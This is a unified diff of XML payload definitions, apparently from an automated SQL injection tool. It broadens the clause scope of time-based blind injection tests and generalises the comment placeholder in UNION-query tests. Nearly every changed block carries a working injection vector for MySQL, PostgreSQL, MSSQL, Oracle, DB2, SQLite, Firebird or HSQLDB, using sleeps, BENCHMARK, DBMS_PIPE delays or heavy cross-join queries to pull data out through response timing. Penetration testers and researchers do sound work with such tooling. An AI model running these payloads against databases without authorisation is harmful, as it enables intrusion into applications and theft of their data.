<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -211,7 +211,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -232,7 +232,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@@ -253,7 +253,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -273,7 +273,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -294,7 +294,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@@ -314,7 +314,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request>
@@ -335,7 +335,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -355,7 +355,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -374,7 +374,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -394,7 +394,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -414,7 +414,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -434,7 +434,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -454,7 +454,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -475,7 +475,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -496,7 +496,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -515,7 +515,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -534,7 +534,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -554,7 +554,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -617,7 +617,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -638,7 +638,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -659,7 +659,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -681,7 +681,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@@ -703,7 +703,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -722,7 +722,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -741,7 +741,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -761,7 +761,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@@ -781,7 +781,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -800,7 +800,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -819,7 +819,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -839,7 +839,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@@ -859,7 +859,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -878,7 +878,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -897,7 +897,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -917,7 +917,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -937,7 +937,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -957,7 +957,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -977,7 +977,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -998,7 +998,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@@ -1019,7 +1019,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1039,7 +1039,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1059,7 +1059,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1080,7 +1080,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1101,7 +1101,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1120,7 +1120,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1139,7 +1139,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1159,7 +1159,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1179,7 +1179,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1199,7 +1199,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1219,7 +1219,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1240,7 +1240,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1261,7 +1261,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1281,7 +1281,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1301,7 +1301,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1322,7 +1322,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@@ -1390,7 +1390,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request>
@@ -1410,7 +1410,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@@ -1430,7 +1430,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
@@ -1450,7 +1450,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1469,7 +1469,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1488,7 +1488,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@@ -1507,7 +1507,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@@ -1527,7 +1527,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@@ -1546,7 +1546,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
@@ -1567,7 +1567,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
<request>
@@ -1589,7 +1589,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request>
@@ -1608,7 +1608,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@@ -1627,7 +1627,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@@ -1646,7 +1646,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
<request>
@@ -1666,7 +1666,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@@ -1686,7 +1686,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@@ -1705,7 +1705,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@@ -1725,7 +1725,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
@@ -1745,7 +1745,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>


@@ -12,7 +12,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -31,7 +31,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -50,7 +50,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
@@ -69,7 +69,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
@@ -88,7 +88,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
@@ -107,7 +107,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>1-10</columns>
</request>
@@ -126,7 +126,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
@@ -145,7 +145,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>11-20</columns>
</request>
@@ -164,7 +164,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>11-20</columns>
</request>
@@ -183,7 +183,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>21-30</columns>
</request>
@@ -202,7 +202,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
